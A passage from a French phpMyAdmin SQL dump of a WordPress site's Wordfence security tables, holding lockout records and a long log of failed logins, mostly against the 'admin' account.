(25000233, 1123632645, 2),
(25000257, 3652607482, 9),
(25000304, 1123632645, 1),
(25000407, 584016457, 2),
(25000575, 2760155812, 1),
(25000677, 3649630461, 3),
(25000678, 3649630461, 3),
(25000700, 1123632645, 1),
(25000751, 1123632645, 1),
(25000759, 2194900209, 1),
(25000759, 1538656104, 2),
(25000825, 1538656104, 2),
(25000885, 3475901893, 1),
(25001011, 1375113052, 1),
(25001150, 1399309361, 2),
(25001192, 1837280593, 2),
(25001535, 1123632645, 1),
(25001587, 2538613875, 2),
(25001654, 1538656104, 2),
(25001831, 2996488251, 1),
(25001831, 1476059143, 1),
(25001831, 2996488242, 1),
(25001965, 1123632645, 2),
(25001974, 2637637469, 1),
(25001985, 3475901892, 1),
(25002113, 1123632645, 1),
(25002206, 1742919172, 2),
(25002291, 1123632645, 1),
(25002357, 1538656104, 2),
(25002363, 1123632645, 1),
(25002396, 3512711551, 1),
(25002398, 1538656104, 2),
(25002447, 1538656104, 2),
(25002454, 1538656104, 2),
(25002468, 3582305802, 1),
(25002483, 2745986569, 8),
(25002484, 2745986569, 1),
(25002525, 1123632645, 1),
(25002544, 3582305802, 2),
(25002605, 1837280593, 2),
(25002616, 1123632645, 1),
(25002683, 1123632645, 1),
(25002702, 3582305802, 1),
(25002722, 3475901892, 1),
(25002723, 1123632645, 1),
(25002946, 3003111232, 2),
(25003058, 3301852133, 1),
(25003136, 1374958463, 3),
(25003149, 1123632645, 1),
(25003155, 96753435, 1),
(25003155, 2760155429, 1),
(25003182, 624870556, 2),
(25003183, 624870556, 2),
(25003195, 1055643623, 1),
(25003241, 976357689, 2),
(25003340, 1463849781, 3),
(25003342, 1463849781, 3),
(25003343, 1463849781, 2),
(25003344, 1463849781, 1),
(25003345, 1463849781, 1),
(25003350, 1463849781, 1),
(25003352, 1463849781, 1),
(25003444, 1123632645, 2),
(25003488, 2745959577, 1),
(25003781, 976357689, 2),
(25003783, 3475901892, 1),
(25003844, 1123631236, 1),
(25004114, 3582305802, 1),
(25004231, 3475901822, 1),
(25004317, 872366381, 1),
(25004505, 3475901892, 1),
(25004660, 1806327814, 1),
(25004690, 3475901729, 1),
(25004982, 1375113052, 1),
(25005019, 1532393936, 1),
(25005080, 786801766, 1),
(25005233, 2637637520, 1),
(25005276, 1375113052, 1),
(25005325, 1375113052, 1),
(25005451, 1123631236, 1),
(25005655, 872366417, 1),
(25005907, 2760155399, 1),
(25005952, 3024883471, 1),
(25005964, 2637637538, 1),
(25006001, 1538358128, 2),
(25006002, 1538358128, 2),
(25006039, 96753435, 1),
(25006039, 872368002, 1),
(25006055, 1538358128, 2),
(25006229, 3657084759, 1),
(25006394, 3103966404, 1),
(25006394, 3256705680, 1),
(25006473, 1399309361, 2),
(25006550, 3657084759, 1),
(25006634, 872366347, 1),
(25006679, 1427857479, 1),
(25006681, 1427857479, 1),
(25006700, 1375113052, 1),
(25006705, 3657084759, 1),
(25006710, 2637637538, 1),
(25006726, 873502953, 2),
(25006740, 1427857479, 1),
(25006743, 1123632645, 1),
(25006769, 1532381390, 1),
(25006935, 3657084759, 1),
(25006978, 3657084759, 1),
(25007010, 1538592859, 2),
(25007026, 2916154802, 2),
(25007032, 3657084759, 1),
(25007084, 1399309361, 2),
(25007117, 3657084759, 1),
(25007258, 3657084759, 1),
(25007319, 1123632645, 2),
(25007433, 2637637538, 1),
(25007477, 1123632645, 1),
(25007532, 1123632645, 1),
(25007559, 2513063484, 1),
(25007855, 1055643893, 4);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfLockedOut`
--

CREATE TABLE `wp_wfLockedOut` (
  `IP` int(10) UNSIGNED NOT NULL,
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) UNSIGNED DEFAULT '0',
  `blockedHits` int(10) UNSIGNED DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfLockedOut`
--

INSERT INTO `wp_wfLockedOut` (`IP`, `blockedTime`, `reason`, `lastAttempt`, `blockedHits`) VALUES
(1840808480, 1497192285, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(2032808987, 1497197627, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(3682725338, 1498448313, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1466596995, 1497955206, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1255184110, 1498406406, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(887721709, 1499521764, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(136172254, 1497016384, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1168352192, 1496778654, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1728496878, 1496843770, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1049988935, 1496512596, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(96963116, 1496807811, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(3489067105, 1496649439, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1539837113, 1496016405, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(2760119799, 1493230816, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'\'', 0, 0),
(1589523921, 1493333441, 'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'administrator\'', 1493347507, 158);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfLocs`
--

CREATE TABLE `wp_wfLocs` (
  `IP` int(10) UNSIGNED NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `failed` tinyint(3) UNSIGNED NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT '0.0000000',
  `lon` float(10,7) DEFAULT '0.0000000'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfLogins`
--

CREATE TABLE `wp_wfLogins` (
  `id` int(10) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `fail` tinyint(3) UNSIGNED NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `UA` text
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfLogins`
--

INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(101788, 1498073279.949281, 1, 'loginFailValidUsername', 'admin', 1, 3181235630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101789, 1498073688.670281, 1, 'loginFailValidUsername', 'admin', 1, 1048588454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101790, 1498073689.864582, 1, 'loginFailValidUsername', 'admin', 1, 1048588454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101791, 1498075109.218547, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101792, 1498076382.462599, 1, 'loginFailValidUsername', 'admin', 1, 774982988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101793, 1498076383.551099, 1, 'loginFailValidUsername', 'admin', 1, 774982988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101794, 1498080682.271613, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101795, 1498081143.041395, 1, 'loginFailValidUsername', 'admin', 1, 3398322094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101796, 1498081144.498527, 1, 'loginFailValidUsername', 'admin', 1, 3398322094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101797, 1498086252.860838, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101798, 1498089428.373546, 1, 'loginFailValidUsername', 'admin', 1, 3305249319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101799, 1498092121.459347, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101800, 1498095704.503463, 1, 'loginFailValidUsername', 'admin', 1, 469753397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101801, 1498095706.134523, 1, 'loginFailValidUsername', 'admin', 1, 469753397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101802, 1498099069.425965, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101803, 1498099839.511774, 1, 'loginFailValidUsername', 'admin', 1, 694796386, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101804, 1498099840.609148, 1, 'loginFailValidUsername', 'admin', 1, 694796386, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101805, 1498100668.263673, 1, 'loginFailValidUsername', 'admin', 1, 1950532940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101806, 1498100669.541004, 1, 'loginFailValidUsername', 'admin', 1, 1950532940, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101807, 1498102063.342985, 1, 'loginFailValidUsername', 'admin', 1, 3551433226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101808, 1498102064.842611, 1, 'loginFailValidUsername', 'admin', 1, 3551433226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101809, 1498103802.810592, 1, 'loginFailValidUsername', 'admin', 1, 1442374565, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; chromeframe; .NET CLR 2.0.50727)'),
(101810, 1498105147.419556, 1, 'loginFailValidUsername', 'admin', 1, 3139973540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101811, 1498105508.725912, 1, 'loginFailValidUsername', 'admin', 1, 1091807106, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; AskTbORJ/5.14.1.20007; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(101812, 1498105998.825602, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101813, 1498110750.274674, 1, 'loginFailValidUsername', 'admin', 1, 1001457484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101814, 1498113169.875662, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101815, 1498114197.276861, 1, 'loginFailValidUsername', 'admin', 1, 466191216, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101816, 1498114198.918312, 1, 'loginFailValidUsername', 'admin', 1, 466191216, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101817, 1498115465.268262, 1, 'loginFailValidUsername', 'admin', 1, 1504899105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101818, 1498115466.339208, 1, 'loginFailValidUsername', 'admin', 1, 1504899105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101819, 1498120936.927215, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101820, 1498123032.393821, 1, 'loginFailValidUsername', 'admin', 1, 1731167259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101821, 1498123034.033108, 1, 'loginFailValidUsername', 'admin', 1, 1731167259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101822, 1498123952.156505, 1, 'loginFailValidUsername', 'admin', 1, 19917958, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101823, 1498124291.512175, 1, 'loginFailValidUsername', 'admin', 1, 2959596063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101824, 1498124294.133243, 1, 'loginFailValidUsername', 'admin', 1, 2959596063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101825, 1498124944.836009, 1, 'loginFailValidUsername', 'admin', 1, 1337291349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101826, 1498124946.055550, 1, 'loginFailValidUsername', 'admin', 1, 1337291349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101827, 1498125216.602381, 1, 'loginFailValidUsername', 'admin', 1, 1393178435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101828, 1498125217.625442, 1, 'loginFailValidUsername', 'admin', 1, 1393178435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101829, 1498125904.153715, 1, 'loginFailValidUsername', 'admin', 1, 1892279657, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101830, 1498125905.803015, 1, 'loginFailValidUsername', 'admin', 1, 1892279657, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101831, 1498129025.478472, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101832, 1498137406.080605, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101833, 1498137643.772358, 1, 'loginFailValidUsername', 'admin', 1, 835697955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101834, 1498137644.948752, 1, 'loginFailValidUsername', 'admin', 1, 835697955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101835, 1498138691.660074, 1, 'loginFailValidUsername', 'admin', 1, 1829643291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101836, 1498138795.989653, 1, 'loginFailValidUsername', 'admin', 1, 3070050086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101837, 1498138797.621807, 1, 'loginFailValidUsername', 'admin', 1, 3070050086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101838, 1498140454.123668, 1, 'loginFailValidUsername', 'admin', 1, 2576789442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101839, 1498140455.640521, 1, 'loginFailValidUsername', 'admin', 1, 2576789442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101840, 1498140460.218725, 1, 'loginFailValidUsername', 'admin', 1, 1441388581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101841, 1498140461.310709, 1, 'loginFailValidUsername', 'admin', 1, 1441388581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101842, 1498141271.485053, 1, 'loginFailInvalidUsername', 'training', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101843, 1498141273.824132, 1, 'loginFailInvalidUsername', 'notre', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101844, 1498141276.225338, 1, 'loginFailInvalidUsername', 'pour', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101845, 1498141278.532604, 1, 'loginFailInvalidUsername', 'cross', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101846, 1498141280.588080, 1, 'loginFailInvalidUsername', 'objectifs', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101847, 1498141282.638240, 1, 'loginFailInvalidUsername', 'venez', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101848, 1498141284.583763, 1, 'loginFailInvalidUsername', 'outils', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101849, 1498141286.682574, 1, 'loginFailInvalidUsername', 'professionnel', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101850, 1498141288.781405, 1, 'loginFailInvalidUsername', 'travail', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101851, 1498141290.775118, 1, 'loginFailInvalidUsername', 'namur', 0, 692940850, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101852, 1498144027.336804, 1, 'loginFailValidUsername', 'admin', 1, 84760548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101853, 1498144028.379708, 1, 'loginFailValidUsername', 'admin', 1, 84760548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101854, 1498146768.907335, 1, 'loginFailValidUsername', 'admin', 1, 656944339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101855, 1498146770.195485, 1, 'loginFailValidUsername', 'admin', 1, 656944339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101856, 1498146833.297721, 1, 'loginFailValidUsername', 'admin', 1, 1497940443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101857, 1498146834.311214, 1, 'loginFailValidUsername', 'admin', 1, 1497940443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101858, 1498147152.587986, 1, 'loginFailValidUsername', 'admin', 1, 2588453269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101859, 1498147153.839592, 1, 'loginFailValidUsername', 'admin', 1, 2588453269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101860, 1498147412.678068, 1, 'loginFailValidUsername', 'admin', 1, 1408934455, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101861, 1498147413.673037, 1, 'loginFailValidUsername', 'admin', 1, 1408934455, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101862, 1498147525.611247, 1, 'loginFailValidUsername', 'admin', 1, 3010263913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101863, 1498147529.105414, 1, 'loginFailValidUsername', 'admin', 1, 3010263913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101864, 1498149959.365678, 1, 'loginFailValidUsername', 'admin', 1, 2997135959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101865, 1498149960.340911, 1, 'loginFailValidUsername', 'admin', 1, 2997135959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101866, 1498151336.809739, 1, 'loginFailValidUsername', 'admin', 1, 16900493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101867, 1498151338.430166, 1, 'loginFailValidUsername', 'admin', 1, 16900493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101868, 1498152360.771543, 1, 'loginFailValidUsername', 'admin', 1, 1848408356, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101869, 1498152364.541973, 1, 'loginFailValidUsername', 'admin', 1, 1848408356, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101870, 1498153700.031529, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101871, 1498153896.303696, 1, 'loginFailValidUsername', 'admin', 1, 1327036161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101872, 1498153897.281607, 1, 'loginFailValidUsername', 'admin', 1, 1327036161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101873, 1498154027.617995, 1, 'loginFailValidUsername', 'admin', 1, 1379151870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101874, 1498154028.847519, 1, 'loginFailValidUsername', 'admin', 1, 1379151870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101875, 1498154167.230060, 1, 'loginFailValidUsername', 'admin', 1, 1571915512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101876, 1498154168.421076, 1, 'loginFailValidUsername', 'admin', 1, 1571915512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101877, 1498158618.178440, 1, 'loginFailValidUsername', 'admin', 1, 1892536336, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101878, 1498158914.919159, 1, 'loginFailValidUsername', 'admin', 1, 1303022440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101879, 1498158915.909809, 1, 'loginFailValidUsername', 'admin', 1, 1303022440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101880, 1498159642.986855, 1, 'loginFailValidUsername', 'admin', 1, 1333073033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101881, 1498159643.972230, 1, 'loginFailValidUsername', 'admin', 1, 1333073033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101882, 1498162868.596496, 1, 'loginFailValidUsername', 'admin', 1, 693563302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101883, 1498162869.933994, 1, 'loginFailValidUsername', 'admin', 1, 693563302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101884, 1498165109.092855, 1, 'loginFailValidUsername', 'admin', 1, 1578483521, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101885, 1498165110.064538, 1, 'loginFailValidUsername', 'admin', 1, 1578483521, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101886, 1498165608.084014, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101887, 1498171249.473969, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101888, 1498171460.628033, 1, 'loginFailValidUsername', 'admin', 1, 3135874693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101889, 1498171462.021751, 1, 'loginFailValidUsername', 'admin', 1, 3135874693, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101890, 1498173054.892393, 1, 'loginFailValidUsername', 'admin', 1, 1609143403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101891, 1498173055.871758, 1, 'loginFailValidUsername', 'admin', 1, 1609143403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101892, 1498174667.542557, 1, 'loginFailValidUsername', 'admin', 1, 634588360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101893, 1498174668.858912, 1, 'loginFailValidUsername', 'admin', 1, 634588360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101894, 1498176996.479397, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101895, 1498180031.903956, 1, 'loginFailValidUsername', 'admin', 1, 1276156434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101896, 1498180033.558943, 1, 'loginFailValidUsername', 'admin', 1, 1276156434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101897, 1498183470.216631, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101898, 1498185949.297631, 1, 'loginFailValidUsername', 'admin', 1, 3171175154, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101899, 1498190665.571990, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
